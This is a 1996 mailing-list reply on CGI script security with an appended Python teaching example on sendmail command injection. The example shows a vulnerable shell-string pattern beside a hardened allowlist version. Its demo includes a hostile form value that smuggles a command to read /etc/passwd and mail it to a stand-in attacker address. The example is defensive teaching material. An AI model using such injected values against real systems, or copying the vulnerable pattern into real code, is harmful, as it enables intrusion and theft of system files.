FirstSearch script security
Steve Westman
swestman at sherlock.sherlock.utsa.edu
Wed Aug 14 12:21:38 EDT 1996
On Wed, 14 Aug 1996, Madeleine Showalter wrote:
> I have been told that "hackers" can enter commands in a form/search engine which can be
> transferred to your operating system. This can allow them to get to a command line
> prompt in your system. So, I assume that "secure" means to prevent this by changing
> your CGI script. That's all I know, I'm just a beginner in using CGI.
>
The answer is simple: Yes and No. If you are not careful in writing your
CGI scripting, you can leave yourself open to attacks, particularly if
you a) are using a UNIX platform for your server, and b) use sendmail
or other SUID types of programs that take user input.
That's the bad news. The "good" (if not "fail-proof") news is that you
can avoid most security problems if you are aware of some of the problems
and you learn to avoid certain practices in your CGI scripting. There
are a number of books and sites out there on the Web, although good starting
places include:
http://www.yahoo.com/Computers_and_Internet/Internet/World_Wide_Web/Security
In particular, check out the "CGI" and "FAQ-World Wide Web Security" links.
If you are using perl for CGI programming on a UNIX platform, you might
also want to check out O'Reilly's "Managing Internet Information Services"
(ISBN 1-56592-062-7). It has good examples of secure script writing
(including a way to keep users from using those nasty characters when
filling out a form that uses the sendmail program to forward the
responses).
Hope this helps.
************************************************************************
Stephen Westman, Electronic Services Librarian
University of Texas at San Antonio Library
6900 North Loop 1604 West, San Antonio, Texas 78249
(210) 691-5977 (phone)   (210) 691-4571 (FAX)
swestman at coyote.utsa.edu
************************************************************************
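An added illustration of the sendmail problem the message above describes (not part of the original post, nor taken from the O'Reilly book it cites). It re-expresses in Python the Perl idiom of the period, open(MAIL, "|/usr/lib/sendmail -t $recipient"), shows what the shell actually executes when a form field contains metacharacters, and puts the hardened form beside it. The sendmail path, the form field and every address are assumptions made for the example.

```python
"""Form field -> sendmail: the injection the message warns about, and a fix.

Added example, not from the original message. The sendmail path, the
form field semantics and the addresses are assumed. The vulnerable pattern
mirrors the Perl piped-open idiom of the era, re-expressed in Python so it
can be run and inspected offline (nothing here actually invokes sendmail).
"""
import re
import shlex
import subprocess

SENDMAIL = "/usr/lib/sendmail"   # assumed 1996-era location of the binary

# --- the vulnerable pattern -------------------------------------------------

def vulnerable_command(recipient: str) -> str:
    """Interpolate the form field into a single string for /bin/sh.

    Equivalent to a piped open() or os.popen(): the shell, not sendmail,
    parses this string, so every metacharacter the user typed is syntax."""
    return f"{SENDMAIL} -t {recipient}"

_SEPARATORS = {";", "|", "||", "&", "&&"}

def shell_would_run(command: str) -> list[list[str]]:
    """Tokenise `command` the way a POSIX shell would and split it into the
    separate command lines the shell would execute. shlex's punctuation_chars
    mode isolates ; | & as their own tokens, so the split is faithful."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands: list[list[str]] = []
    current: list[str] = []
    for token in lex:
        if token in _SEPARATORS:
            if current:
                commands.append(current)
                current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands

# --- the hardened pattern ---------------------------------------------------

# Allowlist, not denylist: exactly one plain address. The first character
# must be alphanumeric so the value can never be read as a sendmail option
# (e.g. -C<config>), and fullmatch() refuses anything trailing a newline.
_ADDRESS_RE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def is_accepted(recipient: str) -> bool:
    return _ADDRESS_RE.fullmatch(recipient) is not None

def safe_command(recipient: str) -> list[str]:
    """Validate, then build an argv list. No shell is involved: each element
    reaches sendmail as exactly one argument, whatever it contains."""
    if not is_accepted(recipient):
        raise ValueError(f"recipient rejected: {recipient!r}")
    return [SENDMAIL, "-oi", recipient]

def send_message(recipient: str, body: str, run=subprocess.run) -> list[str]:
    """Forward a form response. We write the headers; the user's text only
    ever appears after the blank line, so a newline in `body` cannot add a
    header either. `run` is injectable so this can be exercised without a
    working sendmail. Returns the argv that was (or would be) executed."""
    argv = safe_command(recipient)
    message = f"To: {recipient}\nSubject: form response\n\n{body}\n"
    run(argv, input=message.encode("utf-8"), check=True)
    return argv

if __name__ == "__main__":
    # Constructed hostile form value: a valid-looking address followed by
    # two more shell commands.
    hostile = "victim@example.com; cat /etc/passwd | mail attacker@evil.example"
    for cmd in shell_would_run(vulnerable_command(hostile)):
        print("shell would run:", cmd)
    try:
        safe_command(hostile)
    except ValueError as exc:
        print("hardened version:", exc)
```

The two halves differ in kind, not degree: the first hands the shell a string to parse, so the only defence is guessing every character the shell might care about; the second never starts a shell, and the allowlist exists to stop argument injection into sendmail itself rather than to stop the shell.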
More information about the Web4lib mailing list